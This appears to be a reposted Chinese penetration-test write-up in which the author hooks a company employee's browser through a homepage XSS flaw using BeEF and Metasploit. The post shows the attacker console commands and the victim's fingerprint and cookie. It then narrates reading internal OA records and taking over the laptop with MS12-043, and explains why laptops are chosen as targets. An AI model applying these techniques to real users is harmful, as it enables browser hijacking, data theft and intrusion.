BEEF实战全记录

转自:http://www.2cto.com/Article/201207/140515.html

作者 Joe Lynch[Dis9]
1、引言
 
Beef 一个很强大的xss 攻击框架
新版的beef 还不是很熟悉

2、测试开始
 
msf > beef_connect http://192.168.2.106:3000 beef beef
[*] Connected to http://192.168.2.106:3000
msf > beef_online
 
Currently hooked browsers within BeEF
 
Id  IP             OS
--  --             --
0   1.1.1.2  Microsoft Windows
 
msf > beef_target -i 0
Page Title - 马赛克
Page URI - 马赛克
Page Referrer - 马赛克
Hostname/IP - 192.168.2.106
Date - Tue Jul 10 12:35:16 UTC+0800 2012
OS Name - Windows XP
Hardware - Unknown
Browser Name - Internet Explorer
Browser Version - 8
Browser UA String - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Cookies - BEEFHOOK=YyV3f3X3VT9Ivq9egTtvtblFfXvwuEWTKuxu8684i8HOvPBjYvHXmfgsOrcLJyLiOCX3UfVYX5JoPVlF
System Platform - Win32
Screen Size - Width: 1280, Height: 800, Colour Depth: 32
Window Size - Width: 786, Height: 422
Java Enabled - Yes
VBScript Enabled - Yes
Has Flash - Yes
Has GoogleGears - No
Has WebSockets - No
Has ActiveX - Yes
Session Cookies - Yes
Persistent Cookies - Yes
 
为了更好的了解beef 我们使用GUI,
 
浏览器打开http://127.0.0.1:3000/ 登录beef 账户密码默认为beef beef
 www.2cto.com
通过目标网站首页的XSS漏洞 我们现在有一个在线计算机
 
 
 
这是这台机器的基本信息
 


 


我们使用这两个功能来给我们争取时间
一个是关闭的时候弹出是否关闭窗口
另外一个是 弹出一个小弹窗
 


 
通过Rider 访问OA 我得到这名用户的 员工号,姓名,职务等信息.
 
通过职务信息我知道了他是在网络部工作,也许这就是网管?
也许他网站后台会自动登录?
继续 通过rider访问后台 发现并没有保存cookie
 
已经浪费了这么多时间了,那接下来怎么办?
 
OS Name - Windows XP
Hardware - Unknown
Browser Name - Internet Explorer
Browser Version - 8
Java Enabled - Yes
从前面的信息我们看到 这名用户是win XP ie8 的环境 有java
 


使用Get system info
我们得知 用户有一块网卡名为
, Atheros AR928X Wireless Network Adapter
分辨率为\Display0 Mode: 1280x800 32bit @ 60Hertz
Maximum memory (bytes): 259522560
Free memory (bytes): 14597800
Total memory (bytes): 16252928
通过上面信息 我判断出 这肯定是一台笔记本电脑.
高价值目标
 
由于存在java 我尝试了


 
但并没有成功
 
目标主机是winxp 又是IE8 我开始尝试使用网马来获取这台机器的权限
 
使用ms12-043 成功获取权限 过程很简单我就不谢了
 
 
4、总结
 
Q:为何我不一开就是用0day来获取这台机器的权限
A:在本地测试中由于XSS是存在于首页,所以有很多机器,我不可能获取每台的权限后进行逐个筛查,精准定位有利于我只有的继续渗透.
 
Q:为何笔记本电脑为高价值目标?
A:大多数情况下笔记本电脑为员工随身携带物品,基于笔记本我们有机会渗透包括,员工家用电脑,物理隔绝环境等.
 
Q:beef是什么?
A: 一个XSS攻击框架,让XSS攻击更加迅捷与精准.
 
Q:联系方式?
A:hkhdgj@Hotmail.com
 
 
 
本次渗透为黑盒测试所有部分地址由于厂商隐私所以隐藏敬请谅解!

原文地址:https://www.cnblogs.com/shanmao/p/2776694.html